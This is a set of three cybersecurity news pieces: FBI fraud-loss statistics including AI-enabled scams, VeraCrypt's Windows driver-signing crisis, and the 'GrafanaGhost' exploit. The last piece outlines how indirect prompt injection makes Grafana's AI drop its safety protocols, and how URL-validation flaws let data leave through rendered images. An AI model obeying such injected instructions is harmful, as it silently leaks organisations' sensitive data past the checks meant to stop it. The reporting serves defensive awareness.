FBI Report Reveals $17.7 Billion Cyber Fraud Losses as AI Scams Surge

The financial toll of online crime has reached a staggering new peak. According to the latest data from the FBI, victims in the United States suffered cyber fraud losses exceeding $17.7 billion in 2025. This alarming figure, detailed in the bureau’s annual Internet Crime Report, represents a significant increase from the $16 billion lost the previous year and underscores a rapidly escalating threat landscape.

Building on this trend, the FBI’s Internet Crime Complaint Center (IC3) fielded more than a million complaints last year. This translates to nearly 3,000 reports of suspected cybercrime every single day, a sharp rise from the 859,532 complaints recorded in 2024.

Cryptocurrency Scams Top the List of Financial Losses

So, which schemes are draining the most money from victims? Cryptocurrency investment fraud sits firmly at the top. This single category was responsible for a colossal $7.2 billion in losses. Typically, these scams lure individuals with promises of extraordinary, guaranteed returns. Instead of profits, victims find that the fraudsters—and their funds—vanish without a trace.

Business Email Compromise Remains a Major Threat

In addition to crypto scams, Business Email Compromise (BEC) continues to be a highly effective tool for criminals. This method, which involves compromising or spoofing corporate email accounts to authorize fraudulent wire transfers, accounted for over $3 billion in losses in 2025, securing its place as the second costliest cybercrime.

Tech Support and Identity Theft Round Out Major Threats

Meanwhile, fake tech or customer support scams defrauded Americans of more than $2 billion, making it the third-largest source of cyber fraud losses. Other persistent threats like identity theft, data breaches, and ransomware also contributed significantly to the year’s devastating financial totals.

The Rising Cost of AI-Enabled Cyber Fraud

Perhaps the most ominous development in the 2025 report is the formal recognition of artificial intelligence as a weapon for fraudsters. For the first time in its 25-year history, the Internet Crime Report included a dedicated section on AI-enabled crime. Victims lost nearly $893 million to these sophisticated schemes, with the IC3 receiving 22,364 related complaints.

“AI-enabled synthetic content is becoming increasingly difficult to detect and easier to make,” the report states. This allows criminals to craft highly convincing fraud schemes targeting individuals, businesses, and financial institutions. The technology is being used to generate phishing emails and create full-fledged audio and video deepfakes. These tools empower everything from romance scams to elaborate plots where fake personas are used to secure remote jobs, only to defraud the company from within. For more on evolving digital threats, see our guide on understanding modern phishing attacks.

Therefore, the line between reality and digital fabrication is blurring, creating unprecedented challenges for security.

A Call for Vigilance in a Digital Age

In response to these evolving dangers, the FBI has issued a stark warning. “It has never been more important to be diligent with your cybersecurity, social media footprint, and electronic interactions,” said Jose A. Perez, operations director for the FBI’s Criminal and Cyber Branch. He added that cyber threats will continue to evolve as the world adopts new technologies like AI.

Consequently, proactive defense is no longer optional. Earlier this year, the FBI launched Operation Winter Shield, an initiative outlining critical actions organizations must take to bolster their defenses. This move highlights the need for a shift from reactive to preventative security postures. Learn how to strengthen your organizational defenses with our resource on protecting against Business Email Compromise.

Ultimately, the data paints a clear picture: while technology creates opportunity, it also opens new avenues for exploitation. The record-breaking cyber fraud losses of 2025 are a powerful reminder that awareness, skepticism, and robust digital hygiene are essential personal and corporate responsibilities.

Microsoft Account Lockout Threatens VeraCrypt’s Future for Windows Users

The popular open-source encryption tool VeraCrypt faces an existential crisis on Windows. Its lead developer, Mounir Idrassi, has revealed that Microsoft terminated the account he used for years to sign critical Windows drivers and bootloaders. This action, taken without explanation or appeal, could soon prevent millions of users from accessing their fully encrypted systems.

Idrassi, based in Japan, stated he attempted to contact Microsoft but could not reach a human representative. Consequently, he warns that devices using VeraCrypt’s full-disk encryption may become unbootable starting in late June. This situation underscores a critical vulnerability for software that millions rely on for data security.

How Microsoft’s Policy Endangers Encryption Software

At the heart of this crisis is Microsoft’s driver signing requirement. To prevent malware, Windows requires that boot-critical software components carry a valid digital signature from a trusted certificate. Idrassi’s now-terminated account held that authority for VeraCrypt. Building on this, the impending revocation of his certificate means VeraCrypt’s bootloader will fail Microsoft’s security checks, locking users out of their own encrypted operating systems.

For affected users, the immediate risk is not a security flaw but an access barrier. Their data remains encrypted and secure, but the pathway to decrypt and boot the system will be blocked by Windows itself. This creates a paradoxical situation where a security measure designed to protect users instead renders their secure systems inaccessible.

The Broader Implications for Open-Source Development

This incident is not isolated. It highlights a systemic power imbalance where platform gatekeepers like Microsoft and Apple hold unilateral control over software distribution. Earlier this year, developer Paris Buttfield-Addison was locked out of their Apple account, only reinstated after public outcry. Similarly, Idrassi’s case shows how account termination can happen without warning or recourse.

Therefore, the reliance on centralized platforms creates a single point of failure for critical software. VeraCrypt continues to function normally for Linux and macOS users, where distribution models are more decentralized. The problem is uniquely acute for Windows, where Microsoft controls the entire signing ecosystem. This means that even robust, open-source projects live at the mercy of corporate policy changes.

What This Means for VeraCrypt Users

Currently, VeraCrypt installations continue to work. Idrassi has confirmed there are no immediate security issues. However, the clock is ticking. By late June, when Microsoft revokes the existing certificate, systems with full-disk or system encryption enabled will likely fail to start. Users will be presented with an error screen instead of the familiar password prompt.

In addition, Idrassi cannot issue updated, re-signed versions of the software without access to his developer account. This creates a dead end for Windows development. “If the issue is not resolved by then, it would essentially mean a death sentence for VeraCrypt,” he stated bluntly. The community is left hoping for a policy reversal or a new account approval process that seems, for now, opaque and unresponsive.

Navigating the Centralized Platform Dilemma

So, what are the alternatives? For users, the immediate advice is to ensure you have complete, unencrypted backups of all critical data stored separately. For the developer community, this event is a stark reminder of the risks of building on proprietary platforms. It may accelerate interest in fully decentralized signing mechanisms or alternative bootloaders that bypass Windows Secure Boot.

Ultimately, this case forces a difficult conversation about trust and control in software ecosystems. When a single account termination can jeopardize a globally used security tool, it reveals the fragility of our digital infrastructure. The resolution—or lack thereof—will set a precedent for how platform companies manage their relationships with essential open-source maintainers. For more on managing software dependencies, see our guide on open-source security best practices.

As a result, the coming weeks are critical. Will Microsoft provide a path to reinstatement, or will VeraCrypt for Windows become collateral damage in an automated enforcement system? The answer will affect not just one developer, but the security posture of countless users who chose encryption to protect their digital lives. For further reading on encryption tools, explore our analysis of alternative disk encryption solutions.

GrafanaGhost: How a Silent Exploit Evades AI Guardrails to Steal Enterprise Data

A new and critical security threat, known as the GrafanaGhost exploit, is enabling attackers to siphon off sensitive corporate information from monitoring platforms without raising alarms. This method cleverly sidesteps both client-side protections and the very AI guardrails designed to prevent such breaches, operating silently in the background.

Consequently, organizations using Grafana for analytics and monitoring are at risk. The platform often houses a treasure trove of operational intelligence, from financial performance metrics to real-time infrastructure health and customer data, making it a prime target for cybercriminals.

The Mechanics of a Stealthy Attack

Unlike conventional attacks that rely on phishing or stolen passwords, the GrafanaGhost exploit functions by chaining together subtle weaknesses in application logic and AI behavior. Attackers don’t need to break in; they manipulate the system into doing their bidding.

This process unfolds in a multi-stage sequence. First, attackers craft requests that appear legitimate to the system. Next, they employ a technique called indirect prompt injection, which feeds hidden instructions to the AI. These instructions can include specific keywords that cause the AI model to temporarily disregard its own safety protocols.

Bypassing Defenses with Simple Tricks

Building on this, researchers found that the exploit uses surprisingly simple methods to bypass defenses. A flaw in how URLs are validated allows external, malicious domains to be disguised as trusted internal resources. Furthermore, by using protocol-relative URLs, the attack slips past domain checks.

“GrafanaGhost perfectly illustrates how AI integration creates a massive security blind spot,” noted Ram Varadarajan, CEO at Acalvio. “The system is used exactly as designed, but with instructions the AI cannot verify as malicious.”

The Invisible Threat to Enterprise Security

Perhaps the most alarming feature of this GrafanaGhost exploit is its complete stealth. From an administrator’s or user’s viewpoint, nothing is amiss. Dashboards load normally, and there are no phishing emails, suspicious login attempts, or system alerts to investigate.

Therefore, sensitive data—like financial telemetry or server state information—can be attached to outbound requests and sent to attacker-controlled servers, all disguised as routine system activity, such as rendering an image. The data exfiltration happens automatically and invisibly.

“The underlying attack pattern, indirect prompt injection leading to data exfiltration via rendered content, is a well-documented and legitimate attack type,” explained Bradley Smith, SVP and Deputy CISO at BeyondTrust.

Shifting the Cybersecurity Paradigm

This incident signals a broader shift in the threat landscape. Attackers are increasingly moving beyond traditional software vulnerabilities to target the logic and AI components of modern systems. Indirect prompt injection is becoming a weapon of choice.

As a result, traditional security playbooks are insufficient. Relying solely on application-layer security toggles is no longer viable when the attack exploits the system’s intended functions.

How to Defend Against AI-Enabled Data Theft

So, what can security teams do? Experts argue for a fundamental shift in strategy. Defense must move beyond monitoring what an AI agent is instructed to do and instead focus on its runtime behavior. What actions is it actually taking?

“To defend against this, security teams must move beyond application-layer toggles to network-level URL blocking and treat prompt injection as a primary threat rather than an edge case,” Varadarajan advised. Proactive monitoring for anomalous data flows, even from trusted processes, is now essential.

In addition, organizations should review and harden their Grafana deployment configurations and implement strict outbound traffic controls. Understanding the broader context of AI security vulnerabilities is also crucial for building a resilient defense.

Ultimately, the GrafanaGhost exploit serves as a stark reminder. As AI becomes deeply embedded in business tools, our security models must evolve just as quickly to monitor not just access, but intent and outcome.